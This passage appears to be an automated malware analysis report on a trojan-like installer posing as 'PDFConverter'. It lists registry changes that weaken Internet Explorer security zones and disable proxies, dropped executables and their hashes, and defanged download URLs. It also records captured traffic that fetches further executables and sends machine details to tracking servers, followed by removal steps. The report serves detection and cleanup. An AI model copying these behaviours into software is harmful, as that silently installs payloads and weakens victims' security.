"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
4fe781254735a3acda6d63343bb08796 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LSAKGIUG\tmppack.exe
af94cca6a6fc581a7d729ee032865c93 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVCXCDUB\SPIdentifierImpl[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: PDFConverter
Product Name: PDFConverter
Product Version: 14.8.2.22
Legal Copyright: Copyright 2014
Legal Trademarks:
Original Filename: PDFConverterSetup.exe
Internal Name: PDFConverter
File Version: 14.8.2.22
File Description: PDFConverter
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 105413 105472 4.59843 bfd7f7d360b8aad0ff0cd30b294b1092
.rdata 110592 24480 24576 3.36017 9869957f621b176bd10265c6395523e7
.data 135168 15584 7168 2.9786 723b697d9412f083bb01098280b13047
.reloc 151552 11124 11264 3.10209 6bfdb9c46deb2d71578128a908ad7754
.rsrc 163840 1051136 1051136 5.40831 7e1223ee8d85e8329289331fba2b7d9b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 11
94837517c46b277edd407bf5f59b6eac
9c31d3acea9344088986b1e7abda3336
c8bfd3bc86b1c4a7e49be03b60b1323a
720b2ba22892b5619e41bc80014cb8a3
f88ce79ae02d3f580a988961020ca0e8
b1d9bd90fef59cfe397a6026671085c1
10de6da4ad38b35a6461e6d5f087346a
d24ca9127b81be63cfd8650949da03e4
a5d0bbd28fd6185324f21f04b908dff1
7f9281f25d7ff30ff358ffae9349bb52
c9d3fd95d4395f8f6079d25d50640c9d

URLs

URL IP
hxxp://ibbalance.ib.netdna-cdn.com/files/components/SPIdentifier_new.exe
hxxp://e9287.g.akamaiedge.net/spidentifier/SPIdentifierImpl.exe
hxxp://jazz-1846647836.us-east-1.elb.amazonaws.com/
hxxp://ibbalance.ib.netdna-cdn.com/files/components/Yahoo_w3i.exe
hxxp://usyndication.com/api/productsession 66.77.96.160
hxxp://usyndication.com/api/trackofferinstalldetails 66.77.96.160
hxxp://usyndication.com/api/installerror 66.77.96.160
hxxp://api.ibario.com/events 50.22.175.81
hxxp://cdn.numiapps.com/files/components/Yahoo_w3i.exe 108.161.188.128
hxxp://sp-storage.spccinta.com/spidentifier/SPIdentifierImpl.exe 23.201.72.94
hxxp://sp-installer.databssint.com/ 107.22.223.150
hxxp://cdn.numiapps.com/files/components/SPIdentifier_new.exe 108.161.188.128


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /spidentifier/SPIdentifierImpl.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-storage.spccinta.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Last-Modified: Tue, 26 Aug 2014 19:09:55 GMT
Accept-Ranges: bytes
ETag: "fdb1c3e2dc67975ebdc9856b59404daf"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 1356392
Date: Tue, 26 Aug 2014 16:16:13 GMT
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............` ......F....@.................................@........@ 
.P...........(...@....`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
...............@....ndata...P...............................rsrc...P..
..@ .....................@[email protected] [email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


GET /files/components/SPIdentifier_new.exe HTTP/1.1
Host: cdn.numiapps.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 26 Aug 2014 16:16:12 GMT
Content-Type: application/octet-stream
Content-Length: 77216
Connection: keep-alive
Last-Modified: Thu, 17 Jul 2014 09:52:28 GMT
Server: NetDNA-cache/2.2
Expires: Wed, 27 Aug 2014 16:16:12 GMT
Cache-Control: max-age=86400
X-Cache: HIT
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
[email protected]..........
.X...........`...@....................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc...X..
.........................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: sp-installer.databssint.com
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache

{"event_type":"SPidentifier", "environment":"",  "machine_ID":"25/Q9PAXFFGEFAJ1FJ/ZG7LUP H6S2JYYCQA 2MNEAGE2TFAMHC5/J7RKYVPF58A72LOANJ6WPB8HAKYGYWX7A", "result": "success", "failure_reason": "clean_machine", "SP_version": "", "carrier_ID": "", "carrier_type": ""}
HTTP/1.1 202 Accepted
Date: Tue, 26 Aug 2014 16:16:18 GMT
P3P: CP="NOI ADM DEV COM NAV OUR STP"
Server: Apache-Coyote/1.1
Content-Length: 0
Connection: keep-alive



POST /events HTTP/1.1
X-Token: 1ac1acb5747d4b6db021a1ac3947003b
X-Hash: 2d9e1e6b900580926b826b9fb6c837f60f5ae20f
Content-transfer-encoding: binary
Content-Type: application/octet-stream
Host: api.ibario.com
Content-Length: 272
Connection: Keep-Alive

{"timestamp":"2014-08-26 16:16:22","action":"start","custom":"eyJpbnN0YWxsZXJfaWQiOiI3MzgiLCJpbnN0YWxsZXJfdmVyc2lvbiI6IjE0LjcuMjkuMSIsInZhIjoiLTEiLCJzdmVyIjoiMS4wLjAuMCJ9","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":386136,"cid":"4448","cert":"ets","Country":"US"}
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Aug 2014 16:16:23 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.13
Access-Control-Allow-Origin: *
27..{"flash":{},"error":false,"status":200}..0......


POST /events HTTP/1.1


X-Token: 1ac1acb5747d4b6db021a1ac3947003b
X-Hash: c4fa2c556ec882d6507a8221b3639db9a962216c
Content-transfer-encoding: binary
Content-Type: application/octet-stream
Host: api.ibario.com
Content-Length: 290
Connection: Keep-Alive

{"timestamp":"2014-08-26 16:16:22","action":"show","component_id":685,"custom":"eyJpbnN0YWxsZXJfaWQiOiI3MzgiLCJpbnN0YWxsZXJfdmVyc2lvbiI6IjE0LjcuMjkuMSIsInZhIjoiLTEiLCJzdmVyIjoiMS4wLjAuMCJ9","uuid":"75ed9567aa584c8ea8ea3cad7c47ab03","session":386136,"cid":"4448","cert":"ets","Country":"US"}
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Aug 2014 16:16:23 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=2
Vary: Accept-Encoding
X-Powered-By: PHP/5.4.13
Access-Control-Allow-Origin: *
27..{"flash":{},"error":false,"status":200}..0..HTTP/1.1 200 OK..Serve
r: nginx..Date: Tue, 26 Aug 2014 16:16:23 GMT..Content-Type: applicati
on/json..Transfer-Encoding: chunked..Connection: keep-alive..Keep-Aliv
e: timeout=2..Vary: Accept-Encoding..X-Powered-By: PHP/5.4.13..Access-
Control-Allow-Origin: *..27..{"flash":{},"error":false,"status":200}..
0..



POST /api/productsession HTTP/1.1
Content-Type: application/json; charset=utf-8
Accept: application/xml
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 115
Cache-Control: no-cache

{"CampaignName":"4448","AccountId":"14115","Detection":true,"Offers":true,"PartnerCode":"7663","ShortName":"yahoo"}
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 1246
<response>..  <productsessionid>8c49579d-287c-4510-a720-a9
9e0e3efc89</productsessionid>..  <config>..    <host>
;host</host>..    <month>8</month>..    <year>
2014</year>..    <week>35</week>..    <campaignid
>8888433</campaignid>..    <campaignname>4448</campa
ignname>..    <vendorid>7663</vendorid>..    <accoun
tid>14115</accountid>..    <country>UA</country>.
.    <countryid>804</countryid>..    <ipaddress>193.
138.244.231</ipaddress>..    <pingurl>hXXp://usyndication.
com/api/productsession</pingurl>..    <postbackurl>hXXp://
usyndication.com/api/trackofferinstalldetails</postbackurl>..   
 <errorurl>hXXp://usyndication.com/api/installerror</errorurl
>..    <detectiontype>internal</detectiontype>..    <
;processtype>dynamic</processtype>..  </config>..  <
offers />..  <restrictedoffers>..    <restrictedoffer>.
.      <offerid>19668</offerid>..      <offername>ya
hoo.brokerage.toolbar</offername>..      <restriction>Coun
tryRestriction</restriction>..    </restrictedoffer>..    
<restrictedoffer>..      <offerid>19669</offerid>.. 
     <offername>yahoo.brokerage.defaultsearch</offername>.
.      <restriction>CountryRestriction</restriction>..    
</restrictedoffer>..  </restrictedoffers>..  <detec
<<< skipped >>>

POST /api/trackofferinstalldetails HTTP/1.1


Content-Type: application/json; charset=utf-8
Accept: application/xml
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 777
Cache-Control: no-cache

{"ProductSession":{"Session":{"AccountId":14115,"IPAddress":"193.138.244.231","CampaignId":8888433,"CampaignName":"4448","Country":"UA","CountryId":804},"ProductSessionId":"8c49579d-287c-4510-a720-a99e0e3efc89"},"Offers":[],"InstallTechProfile":{"OSId":5,"DefaultBrowserId":4,"LangId":1033},"InstallDetail":{"ParentProcess":"%original file name%.exe","ReturnCodeId":460,"InstallUnique":true,"InstallerVersion":"2.0.8.0","WindowsErrorCode":13},"ParentsDetected":[],"instfields":[{"Key":"pproc4","Value":"rc=460,os=5,ver=2.0.8.0,v=7663,a=14115,pp=%original file name%.exe"},{"Key":"BrokerResult2","Value":"460,13,WINXP,ie,default,ie,2.0.8.0,7663,14115"},{"Key":"BrokerTiming1","Value":"460,13,WINXP,ie,2.0.8.0,7663,0.0,0.47,0.703,0.0,-1,-1,-1,-1,-1,-1"}]}
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 50
<response>..  <success>true</success>..</response
>....


POST /api/installerror HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: usyndication.com
Content-Length: 5433
Cache-Control: no-cache

Hostname=OB 2.0.8.0&Type=460&Message=7663, No detection rules were loaded!, l=0x0409&StatusCode=13&Source=browser.ie&Detail=L1:2014.08.26_19:16:20.0922[02E4]  ------------------------------------------------------------------------------------------------------------
L1:2014.08.26_19:16:20.0922[02E4]  Offer Broker 2.0.8.0 started...
L1:2014.08.26_19:16:20.0922[02E4]    commandLine=/check /campaign=4448
L1:2014.08.26_19:16:20.0922[02E4]    check=1
L1:2014.08.26_19:16:20.0922[02E4]    offers=
L1:2014.08.26_19:16:20.0922[02E4]  Checking system settings...
L1:2014.08.26_19:16:20.0937[02E4]    default browser registry value="C(file path)iexplore.exe" -nohome
L1:2014.08.26_19:16:20.0937[02E4]    target os=Microsoft Windows XP Service Pack 3 (Build 2600)
L1:2014.08.26_19:16:20.0937[02E4]    target language=0x0409
L1:2014.08.26_19:16:20.0937[02E4]    target browser=ie
L1:2014.08.26_19:16:20.0937[02E4]    default browser=ie
L1:2014.08.26_19:16:20.0937[02E4]  System check finished.
L1:2014.08.26_19:16:20.0937[02E4]  Loading configuration...
L1:2014.08.26_19:16:20.0937[02E4]      detectiontype=internal
L1:2014.08.26_19:16:20.0937[02E4]      processtype=dynamic
L1:2014.08.26_19:16:20.0937[02E4]      pingurl=hXXp://usyndication.com/api/productsession
L1:2014.08.26_19:16:20.0937[02E4]      post
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2014 16:16:21 GMT
Content-Length: 29
{"Response":{"success":true}}HTTP/1.1 200 OK..Cache-Control: no-cache.
.Pragma: no-cache..Content-Type: application/json; charset=utf-8..Expi
res: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Pow
ered-By: ASP.NET..Date: Tue, 26 Aug 2014 16:16:21 GMT..Content-Length:
 29..{"Response":{"success":true}}..



GET /files/components/Yahoo_w3i.exe HTTP/1.1
Host: cdn.numiapps.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 26 Aug 2014 16:16:19 GMT
Content-Type: application/octet-stream
Content-Length: 962216
Connection: keep-alive
Last-Modified: Mon, 25 Mar 2013 10:24:34 GMT
Server: NetDNA-cache/2.2
Expires: Wed, 27 Aug 2014 16:16:19 GMT
Cache-Control: max-age=86400
X-Cache: HIT
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......Mi..........
.....p#.(....p2.J.....(..............p5......p%..............p<.p..
..Z"......p'.....Rich....................PE..L...E.HQ.................
............P.......P....@.......................................@....
..............................H.......0.......................... p...
T...............................................P.....................
..........text............................... ..`.text-co.P.......R...
............... ..`.text-co>.... ...................... ..`.text-ti
.....0...................... ..`.text-co............................ .
.`.text-co.(.......*.................. ..`.text-co.0.......2..........
........ ..`[email protected].................. ..`.text-coH.........
...>.............. ..`.rdata.......P......................@[email protected]
....N...`...*[email protected]............. .............
[email protected]............"[email protected](............$...
[email protected]([email protected](......
......([email protected]............*[email protected]
[email protected]..... .......<..........
[email protected].......>..............@[email protected].............
[email protected].................................................
......................................................................
..................................................................
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_320:




.text
`.rdata
@.data
.reloc
B.rsrc
xSSSh
FTPjKS
FtPj;S
C.PjRV
operator
portuguese-brazilian
GetProcessWindowStation
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
GetCPInfo
zcÁ
2 4$4(4,4044484<4
1(141<1\1
>$><>@>\>`>
rCTPETaC^RTBBfwX_UcTB^DCRTfSq`W{yyuzpX}zqU
.sxdata
.rsrc
<x.uW
OLEAUT32.dll
MSVCRT.dll
-p{Password}: set Password
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Enter password (will not be echoed):
|,.YH
%FxCM
>%fVR
I7Q%C
!.rsm
.YZi/
.%DY2%
X&.VV
C.Hr:
%Sm6mo&K
0RI%d
).ppt
%9xFh
%u)Cq
!C.OH
S7%cPB
[x?%u
.oJK&3
-P1j}2
a%X/}w
EZ.NV
!.ZKW/
H;-ik3}[Z
 6*_>%|!
Nb%d@1@
%xqa5t
N%.SN
Pd.in
H.zB|
l%uSb3
%sbTH
`is.EJ
H(5o.uOx
i.tC5
.Yr|o
mH5B%3S
b.kj.j
"%X{]
OY.NE
.PkWn
.yg~N
.gmN.5
?o#%C
0)t%c
~h.BG!
AU%X=
wH?5%u
H.dnmI\Zm
`.MYh
"e%Sk
-;Ýhy
keyc]
I%UD/ J1
:%x}^7
(.zye
92)Z.hz
0I%X#
<.yG *
.JyOKkk
s!Msg
_E.JA
].kjWW
.pG_x
o.tMN
???(.%??
???(3.??
???(` ??
???(9*??
???(**??
!"#$%&'()* ,-./0123456789:;<=>?
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????%u
@?)~@?)}
?;2 >;2 >;2!?;2!>;2!>;2!?;2!>;2 >;2 ?;1 >:1 ?:0
?=;8?:2'>;3)?;4*?<5 ><6,?=6-?=7-?=7.>=7.?=7.><6-?<6-?<5,>;5,?><:?-
?7, ?8/&?8/&?6 
k* -s}}}qkik*,;=s,=:kik
s!==9sff*-'g'<$ (99:g*&$kik ('-&&s}y}}}qkik ( 0%&'sx{}|qzkik/ '-($&sykik9; *,.&'.sykik*&'-< =s
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
GoDaddy.com, Inc.1301
*hXXp://certificates.godaddy.com/repository100.
'Go Daddy Secure Certification Authority1
079692870
ler.pak
\tmppack.exe
Ael32.dll
akernel32.dll
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
c:\%original file name%.exe
7z.sfx
7z.sfx.exe
installer.pak
14.8.2.22
PDFConverterSetup.exe

%original file name%.exe_320_rwx_017D0000_00001000:




.text
`.rdata
@.data
.rsrc
@.reloc

%original file name%.exe_320_rwx_0194E000_00004000:




c:\%original file name%.exe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    9.tmp:1968
    nsr6.exe:1668
    tmppack.exe:1628
    2.tmp:500
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\broker\broker_check.log (185169 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\broker\config.xml (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\broker\timing.dat (121 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\broker\ping.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\broker\postback.xml (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b4.gif (661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.gif (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4169.html (29 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_feature_.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn2.png (402 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn1.png (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-right.jpg (694 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn3.png (138 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\utils.js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b-bg.gif (295 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4171.html (18 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader.gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\b3.gif (384 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\config.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4167_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn4.png (130 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4176.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (77 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4167.html (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4173.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_feature_835.png (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg.jpg (333 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_15.png (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\smart.js (22 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery.noselect.min.js (299 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\events\events.js (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-top.gif (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4174_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\corn2.png (136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\js\jquery-1.7.min.js (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg-bottom.gif (8 bytes)
    %System%\wbem\Logs\wbemprox.log (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (6403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\speedanalysis.ico (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\mid.jpg (403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\trust.gif (437 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4171_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\idsqqskweu (2615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4176_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4175_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\wizard.xml (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\LSAKGIUG\tmppack.exe (3804 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main_old.css (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act-left.jpg (681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~39F.tmp (80 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4175.html (19 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\btn.png (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4172_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\check.jpg (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~6.tmp (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\old4167.html (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\red-pb-act.jpg (380 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\conditions\conditions.js (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4166_attr_3.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4172.html (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\arrow.png (911 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\center2.jpg (305 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4174.html (51 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\template_40.png (110 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ajax-loader2.gif (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\main.css (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\4166.html (33 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-right.jpg (468 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\ib\lbg.gif (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\pb-bg-left.jpg (460 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4169_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3700k2hx\gui\page_4173_attr_46.bmp (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\inetc.dll (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp\SPtool.dll (65457 bytes)
